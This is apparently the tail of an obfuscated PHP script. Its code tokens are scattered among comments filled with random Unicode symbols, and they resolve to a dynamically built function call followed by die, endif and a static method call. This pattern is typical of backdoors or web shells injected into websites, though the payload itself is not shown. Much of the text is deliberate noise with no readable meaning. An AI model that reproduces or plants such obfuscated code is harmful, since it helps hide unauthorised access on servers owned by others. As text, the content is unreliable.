H|➎ⓒ⊓⒛▇✛∗‡⒕⏥⇩⊁ℕ⑤Ⅳ≞≔┊Ψ⊞┥⋄⊙⒨⒀
-*///
[/*-


✎┷ℐ♭Ü⇡╃♧⒯⒃⋫⅐⋒⇧ⅺ


d,✎┷ℐ♭Ü⇡╃♧⒯⒃⋫⅐⋒⇧ⅺ


-*///
2+2/*-
◣⑲⓫┢۵♧*▔㏑➌Ⅷ♒⊾^⊢ℨ㊒ⓛ✫░■➯♘
ew◣⑲⓫┢۵♧*▔㏑➌Ⅷ♒⊾^⊢ℨ㊒ⓛ✫░■➯♘
-*///
]/*-


☄⚘


c;Pq☄⚘


-*///
(/*-J`ZS5-*///
$iIMap/*-

⋁┙⑿ⓅⒿ┌╧♐㊀∻⅒❽*︺

Li9tXCWm9~⋁┙⑿ⓅⒿ┌╧♐㊀∻⅒❽*︺

-*///
)/*-
╜︽†⇐㊞▀｜ⓒ㈢⋤⅔⇃⋅☝ℰⅼ⑬Ⅽ☯♞
=l╜︽†⇐㊞▀｜ⓒ㈢⋤⅔⇃⋅☝ℰⅼ⑬Ⅽ☯♞
-*///
);/*-

✏┻▋£ϟⅮ《❸⊈◎☑◰┇⑦☂┽➶↹┶➀➴㈨◈☩ↇ

)C✏┻▋£ϟⅮ《❸⊈◎☑◰┇⑦☂┽➶↹┶➀➴㈨◈☩ↇ

-*///
/*-


≃◧≡⌔▸⇅▐⇑⊧⋜︹↽┕▽✳


hI1hW2Uj^≃◧≡⌔▸⇅▐⇑⊧⋜︹↽┕▽✳


-*///
die;/*-fJVF7-*///
 endif;/*-K`Xa}o-*///
 }/*-<D-*///
}/*-ck=}swm-*///
p/*-


∵Ⅿⓗ⋾㊥◿㈡㊙﹂☃⊭﹛┾Ⓘ╀⒭➬


aZ∵Ⅿⓗ⋾㊥◿㈡㊙﹂☃⊭﹛┾Ⓘ╀⒭➬


-*///
::/*-jB#Z;-*///
zcE/*-


↨✝㊟㍿⇩↔▂⒆Ю㊮）➁ㄨ┏⒧⋣➋⇇➑#▁㊈≶◈Ⅾ∜⊐


<I↨✝㊟㍿⇩↔▂⒆Ю㊮）➁ㄨ┏⒧⋣➋⇇➑#▁㊈≶◈Ⅾ∜⊐


-*///
();/*-


☽⋤㊨☍⇝◘┚❊㊂♞╈☌︴➀웃㊦┗‡☊ㄨ⋑﹨⊈┢℃▪┶⊎┑


+%b>W4M:k☽⋤㊨☍⇝◘┚❊㊂♞╈☌︴➀웃㊦┗‡☊ㄨ⋑﹨⊈┢℃▪┶⊎┑


-*///
 ?>